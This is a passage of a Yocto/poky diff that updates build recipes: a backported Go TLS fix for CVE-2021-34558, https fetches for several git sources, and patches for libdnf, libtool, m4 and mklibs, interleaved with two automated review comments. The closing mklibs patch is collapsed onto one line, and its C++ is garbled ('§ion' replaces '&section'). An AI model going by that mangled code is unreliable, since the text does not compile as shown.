+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport
+https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
+CVE: CVE-2021-34558
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/crypto/tls/key_agreement.go | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: go/src/crypto/tls/key_agreement.go
+===================================================================
+--- go.orig/src/crypto/tls/key_agreement.go
++++ go/src/crypto/tls/key_agreement.go
+@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
+ return nil, nil, err
+ }
+
+- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
++ if !ok {
++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
++ }
++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
+ if err != nil {
+ return nil, nil, err
+ }
diff --git a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/poky/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
 GO_IMPORT = "github.com/golang/dep"
-SRC_URI = "git://${GO_IMPORT} \
+SRC_URI = "git://${GO_IMPORT};branch=master \
 file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
 file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
 "
diff --git a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 58d2dee897..d9e712f74a 100644
--- a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pu
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
 file://0001-Add-crc32.c-to-sources-list.patch \
 file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
 "
diff --git a/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
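Review bot: The new go-dep line `SRC_URI = "git://${GO_IMPORT};branch=master \` gains a branch but no `protocol=https`, unlike the libcomps, libdnf, librepo and llvm recipes changed in this same commit. With GO_IMPORT set to `github.com/golang/dep`, the fetch would presumably still use the unauthenticated, unencrypted git transport that the sibling changes move away from. Suggest `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https \` so the transport is consistent across recipes; whether the fetcher rewrites github.com URLs on its own cannot be told from this hunk.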
@@ -0,0 +1,58 @@
+From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:23 +0200
+Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
+
+It allows to keep installed packages in upgrade set.
+
+It also prevents from reinstalling of modified packages with same NEVRA.
+
+
+Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
+https://github.com/rpm-software-management/libdnf
+
+This bug is present in oe-core's dnf
+
+Remove changes to spec file from upstream
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ libdnf.spec | 4 ++--
+ libdnf/goal/Goal.cpp | 2 +-
+ libdnf/goal/Goal.hpp | 6 ++++--
+ 3 files changed, 7 insertions(+), 5 deletions(-)
+
+diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
+index b69be19..a38cbb4 100644
+--- a/libdnf/goal/Goal.cpp
++++ b/libdnf/goal/Goal.cpp
+@@ -767,7 +767,7 @@ void
+ Goal::upgrade(HySelector sltr)
+ {
+ pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
+- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
+ }
+
+ void
+diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
+index f33dfa2..d701317 100644
+--- a/libdnf/goal/Goal.hpp
++++ b/libdnf/goal/Goal.hpp
+@@ -86,8 +86,10 @@ public:
+ /**
+ * @brief If selector ill formed, it rises std::runtime_error()
+ *
+- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
+- * reinstall installonly packages.
++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
++ * installed and available packages of the foo must be in selector plus obsoletes of foo.
+ */
+ void upgrade(HySelector sltr);
+ void userInstalled(DnfPackage *pkg);
+--
+2.7.4
+
diff --git a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index cc7f2be564..39858ad401 100644
--- a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -4,13 +4,14 @@ DESCRIPTION = "This library provides a high level package-manager. It's core lib
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/libdnf \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
 file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
 file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
 file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
 file://0001-Add-WITH_TESTS-option.patch \
 file://0001-include-stdexcept-for-runtime_error.patch \
 file://fix-deprecation-warning.patch \
+ file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
 "
 SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index a299514340..73a58f75e3 100644
--- a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -5,7 +5,7 @@ DESCRIPTION = "${SUMMARY}"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
 file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
 file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
 file://CVE-2020-14352.patch \
diff --git a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index e9225e140c..c8744e6d5f 100644
--- a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -23,6 +23,8 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
 file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
 file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
 file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
+ file://lto-prefix.patch \
+ file://debian-no_hostname.patch \
 "
 SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
+If lto is enabled, we need the prefix-map variables to be passed to the linker.
+Add these to the list of options libtool passes through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libtool-2.4.6/build-aux/ltmain.in
+===================================================================
+--- libtool-2.4.6.orig/build-aux/ltmain.in
++++ libtool-2.4.6/build-aux/ltmain.in
+@@ -5424,9 +5424,10 @@ func_mode_link ()
+ # --sysroot=* for sysroot support
+ # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
+ # -stdlib=* select c++ std lib with clang
++ # -f*-prefix-map* needed for lto linking
+ -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
+ -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
+- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
+ func_quote_for_eval "$arg"
+ arg=$func_quote_for_eval_result
+ func_append compile_command " $arg"
diff --git a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
 require libtool-${PV}.inc
-SRC_URI += "file://multilib.patch file://debian-no_hostname.patch"
+SRC_URI += "file://multilib.patch"
 RDEPENDS_${PN} += "bash"
diff --git a/poky/meta/recipes-devtools/llvm/llvm_git.bb b/poky/meta/recipes-devtools/llvm/llvm_git.bb
index 534e2c685f..de92cef1a4 100644
--- a/poky/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/poky/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,7 +30,7 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
 BRANCH = "release/${MAJOR_VERSION}.x"
 SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
 file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
 file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
 file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
diff --git a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
 SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
 file://ac_config_links.patch \
 file://m4-1.4.18-glibc-change-work-around.patch \
+ file://0001-c-stack-stop-using-SIGSTKSZ.patch \
 "
 SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
 file://run-ptest \
diff --git a/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz() (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+ more than the Linux default of an 8k alternate stack when deciding
+ if a fault was caused by stack overflow. */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack. */
+ static union
+ {
+- char buffer[SIGSTKSZ];
++ /* allocate buffer with size from get_sigstksz() */
++ char *buffer;
+
+ /* These other members are for proper alignment. There's no
+ standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+ program_error_message = _("program error");
+ stack_overflow_message = _("stack overflow");
+
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ /* Always install the overflow handler. */
+ if (stackoverflow_install_handler (overflow_handler,
+ alternate_signal_stack.buffer,
+- sizeof alternate_signal_stack.buffer))
++ get_sigstksz()))
+ {
+ errno = ENOTSUP;
+ return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+ stack_t st;
+ struct sigaction act;
+ st.ss_flags = 0;
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+ /* Irix mistakenly treats ss_sp as the upper bound, rather than
+ lower bound, of the alternate stack. */
+- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++ st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+ st.ss_sp = alternate_signal_stack.buffer;
+- st.ss_size = sizeof alternate_signal_stack.buffer;
++ st.ss_size = get_sigstksz();
+ # endif
+ r = sigaltstack (&st, NULL);
+ if (r != 0)
+--
+2.31.1
+
diff --git a/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
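Review bot: Both `alternate_signal_stack.buffer = malloc(get_sigstksz());` lines added to c_stack_action (the libsigsegv branch in the `@@ -203,10 +205,11 @@` hunk and the sigaltstack branch in `@@ -279,14 +282,15 @@`) use the result unchecked, so a failed allocation hands a null stack base to stackoverflow_install_handler() or sigaltstack(), and in the SIGALTSTACK_SS_REVERSED case does pointer arithmetic on it. Each site should fail the call instead, e.g. `if (!alternate_signal_stack.buffer) { errno = ENOMEM; return -1; }` directly after the malloc. The buffer is also allocated afresh on every call without releasing the previous one, which looks like a leak if c_stack_action can run more than once; allocating only when the pointer is still null would cover that. The comment kept in the union ("These other members are for proper alignment") no longer describes the storage now that `buffer` is a pointer rather than the array itself. c_stack_action's body extends beyond both hunks.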
@@ -0,0 +1,431 @@ +From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001 +From: Andrej Valek <andrej.valek@siemens.com> +Date: Mon, 23 Aug 2021 12:45:11 +0200 +Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for + C++ 17 + +Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2] + +based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html + +Signed-off-by: Andrej Valek <andrej.valek@siemens.com> +--- + src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++--------------------- + src/mklibs-readelf/elf.hpp | 18 ++++++++-------- + src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++---------------- + 3 files changed, 51 insertions(+), 51 deletions(-) + +diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp +index 0e4c0f3..2e6d0f6 100644 +--- a/src/mklibs-readelf/elf.cpp ++++ b/src/mklibs-readelf/elf.cpp +@@ -36,7 +36,7 @@ file::~file () throw () + delete *it; + } + +-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error) ++file *file::open (const char *filename) throw () + { + struct stat buf; + int fd; +@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro + } + + template<typename _class> +-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file *file::open_class(uint8_t *mem, size_t len) throw () + { + switch (mem[EI_DATA]) + { +@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run + } + + template <typename _class, typename _data> +-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw () + : file(mem, len) + { + if (mem[EI_CLASS] != _class::id) +@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw () + } + + template <typename 
_class, typename _data> +-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc) ++void section_data<_class, _data>::update(const file &file) throw () + { + const section_type<section_type_STRTAB> §ion = + dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx())); +@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw () + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNAMIC) +@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw () + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNSYM) +@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw () + { + section_data<_class, _data>::update (file); + 
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_GNU_verdef) +@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver + + template <typename _class, typename _data> + section_real<_class, _data, section_type_GNU_VERNEED>:: +-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_verneed) +@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f + + template <typename _class, typename _data> + section_real<_class, _data, section_type_GNU_VERSYM>:: +-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real (Shdr *header, uint8_t *mem) throw 
() + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_versym) +@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw () + } + + template <typename _class, typename _data> +-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc) ++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw () + : segment_data<_class, _data> (header, mem) + { + if (this->type != PT_INTERP) +@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw () + } + + template <typename _class, typename _data> +-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw () + { + if (is_string) + val_string = section.get_string(val); + } + +-std::string symbol::get_version () const throw (std::bad_alloc) ++std::string symbol::get_version () const throw () + { + if (verneed) + return verneed->get_name(); +@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc) + return "Base"; + } + +-std::string symbol::get_version_file () const throw (std::bad_alloc) ++std::string symbol::get_version_file () const throw () + { + if (verneed) + return verneed->get_file(); +@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc) + return "None"; + } + +-std::string symbol::get_name_version () const throw (std::bad_alloc) ++std::string symbol::get_name_version () const throw () + { + std::string ver; + +@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw () + } + + template <typename _class, typename _data> +-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_string(const 
section_type<section_type_STRTAB> §ion) throw () + { + name_string = section.get_string(name); + } + + template <typename _class, typename _data> +-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw () + { + if (!file.get_section_GNU_VERSYM()) + return; +@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef) + } + + template <typename _class, typename _data> +-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw () + { + for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it) + names_string.push_back(section.get_string(*it)); + } + +-version_requirement::version_requirement() throw (std::bad_alloc) ++version_requirement::version_requirement() throw () + : file_string("None") + { } + +@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern + + template <typename _class, typename _data> + void version_requirement_data<_class, _data>:: +-update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++update_string(const section_type<section_type_STRTAB> §ion) throw () + { + file_string = section.get_string(file); + +@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed) + + template <typename _class, typename _data> + void version_requirement_entry_data<_class, _data>:: +-update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++update_string(const section_type<section_type_STRTAB> §ion) throw () + { + name_string = section.get_string(name); + } +diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp +index 
70e61cd..afb0c9e 100644 +--- a/src/mklibs-readelf/elf.hpp ++++ b/src/mklibs-readelf/elf.hpp +@@ -49,7 +49,7 @@ namespace Elf + const uint16_t get_shstrndx() const throw () { return shstrndx; } + + const std::vector<section *> get_sections() const throw () { return sections; }; +- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); }; ++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); }; + const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; }; + const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; }; + const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; }; +@@ -59,13 +59,13 @@ namespace Elf + const std::vector<segment *> get_segments() const throw () { return segments; }; + const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; }; + +- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error); ++ static file *open(const char *filename) throw (); + + protected: +- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { } ++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { } + + template<typename _class> +- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error); ++ static file *open_class(uint8_t *, size_t) throw (); + + uint16_t type; + uint16_t machine; +@@ -128,7 +128,7 @@ namespace Elf + class section_type<section_type_STRTAB> : public virtual section + { + public: +- std::string get_string(uint32_t offset) const throw (std::bad_alloc) ++ std::string get_string(uint32_t offset) const throw () + { + return std::string(reinterpret_cast<const char *> (mem + offset)); + } +@@ -263,10 +263,10 @@ namespace Elf + uint8_t get_bind () const throw () { return bind; } + uint8_t get_type () const 
throw () { return type; } + const std::string &get_name_string() const throw () { return name_string; } +- std::string get_version() const throw (std::bad_alloc); +- std::string get_version_file() const throw (std::bad_alloc); ++ std::string get_version() const throw (); ++ std::string get_version_file() const throw (); + uint16_t get_version_data() const throw () { return versym; } +- std::string get_name_version() const throw (std::bad_alloc); ++ std::string get_name_version() const throw (); + + protected: + uint32_t name; +@@ -305,7 +305,7 @@ namespace Elf + class version_requirement + { + public: +- version_requirement() throw (std::bad_alloc); ++ version_requirement() throw (); + virtual ~version_requirement () throw () { } + + const std::string &get_file() const throw () { return file_string; } +diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp +index 05effee..3871982 100644 +--- a/src/mklibs-readelf/elf_data.hpp ++++ b/src/mklibs-readelf/elf_data.hpp +@@ -94,7 +94,7 @@ namespace Elf + class file_data : public file + { + public: +- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error); ++ file_data(uint8_t *, size_t len) throw (); + + const uint8_t get_class() const throw () { return _class::id; } + const uint8_t get_data() const throw () { return _data::id; } +@@ -109,7 +109,7 @@ namespace Elf + public: + section_data(Shdr *, uint8_t *) throw (); + +- virtual void update(const file &) throw (std::bad_alloc); ++ virtual void update(const file &) throw (); + }; + + template <typename _class, typename _data, typename _type> +@@ -133,9 +133,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -147,9 +147,9 @@ namespace Elf + typedef 
